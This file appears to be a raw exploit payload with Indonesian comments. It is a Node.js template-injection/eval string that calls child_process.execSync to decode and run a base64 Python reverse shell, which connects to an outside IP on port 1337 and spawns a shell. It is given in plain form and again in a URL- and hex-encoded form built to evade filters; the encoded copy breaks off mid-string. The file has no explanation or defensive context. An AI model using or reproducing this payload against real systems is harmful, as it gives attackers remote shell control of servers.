// plain payload (belum di encode)
#{'eval(global.process.mainModule.constructor._load('child_process').execSyn
c('echo
cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChz
b2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjkxLjIwNS4xNzIu
MzEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtv
cy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJw== |
base64 -d | sh').toString())'instanceof{[Symbol.hasInstance]:eval}}

// payload (encoded)
%23{%27eval\x28%22\x67\x6c\x6f\x62\x61\x6c\x2e\x70\x72\x6f\x63\x65\x73\x73\x
2e\x6d\x61\x69\x6e\x4d\x6f\x64\x75\x6c\x65\x2e\x63\x6f\x6e\x73\x74\x72\x75\x
63\x74\x6f\x72\x2e\x5f\x6c\x6f\x61\x64\x28\x27\x63\x68\x69\x6c\x64\x5f\x70\x
72\x6f\x63\x65\x73\x73\x27\x29\x2e\x65\x78\x65\x63\x53\x79\x6e\x63\x28\x27\x
65\x63\x68\x6f\x20\x63\x48\x6c\x30\x61\x47\x39\x75\x4d\x79\x41\x74\x59\x79\x
41\x6e\x61\x57\x31\x77\x62\x33\x4a\x30\x49\x48\x4e\x76\x59\x32\x74\x6c\x64\x
43\x78\x7a\x64\x57\x4a\x77\x63\x6d\x39\x6a\x5a\x58\x4e\x7a\x4c\x47\x39\x7a\x
4f\x33\x4d\x39\x63\x32\x39\x6a\x61\x32\x56\x30\x4c\x6e\x4e\x76\x59\x32\x74\x
6c\x64\x43\x68\x7a\x62\x32\x4e\x72\x5a\x58\x51\x75\x51\x55\x5a\x66\x53\x55\x
35\x46\x56\x43\x78\x7a\x62\x32\x4e\x72\x5a\x58\x51\x75\x55\x30\x39\x44\x53\x
31\x39\x54\x56\x46\x4a\x46\x51\x55\x30\x70\x4f\x33\x4d\x75\x59\x32\x39\x75\x
62\x6d\x56\x6a\x64\x43\x67\x6f\x49\x6a\x6b\x78\x4c\x6a\x49\x77\x4e\x53\x34\x
78\x4e\x7a\x49\x75\x4d\x7a\x45\x69\x4c\x44\x45\x7a\x4d\x7a\x63\x70\x4b\x54\x
74\x76\x63\x79\x35\x6b\x64\x58\x41\x79\x4b\x48\x4d\x75\x5a\x6d\x6c\x73\x5a\x
57\x35\x76\x4b\x43\x6b\x73\x4d\x43\x6b\x37\x49\x47\x39\x7a\x4c\x6d\x52\x31\x
63\x44\x49\x6f\x63\x79\x35\x6d\x61\x57\x78\x6c\x62\x6d\x38\x6f\x4b\x53\x77\x
78\x4b\x54\x74\x76\x63\x79\x35\x6b\x64\x58\x41\x79\x4b\x48\x4d\x75\x5a\x6d\x
6c\x73\x5a\x57\x35\x76\x4b\x43\x6b\x73\x4d\x69\x6b\x37\x61\x57\x31\x77\x62\x
33\x4a\x30\x49\x48\x42\x30\x65\x54\x73\x67\x63\x48\x52\x35\x4c\x6e\x4e\x77\x
59\x58\x64\x75\x4b\x43\x4a\x7a\x61\x43\x49\x70\x4a\x77\x3d\x3d\x20\x7c\x20\x
62\x61\x73\x65\x36\x34\x20\x2d\x64\x20\x7c\x20\x73\x68\x27\x29\x2e\x74\x6f\x
53\x74\